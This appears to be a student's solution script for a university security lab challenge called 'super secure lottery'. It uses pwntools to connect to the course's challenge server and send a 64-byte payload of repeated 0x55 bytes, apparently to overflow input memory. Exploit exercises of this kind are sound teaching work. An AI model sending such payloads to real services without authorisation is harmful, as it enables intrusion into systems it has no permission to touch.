Files
ssof_labs/pa/lab6/chall_super_secure_lottery.py
2025-12-20 16:49:47 +00:00

11 lines
179 B
Python

from pwn import *
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25161
conn = remote(HOST, PORT)
conn.recvuntil(b":")
pl = b"\x55"*(64)
conn.send(pl)
print(conn.recvline())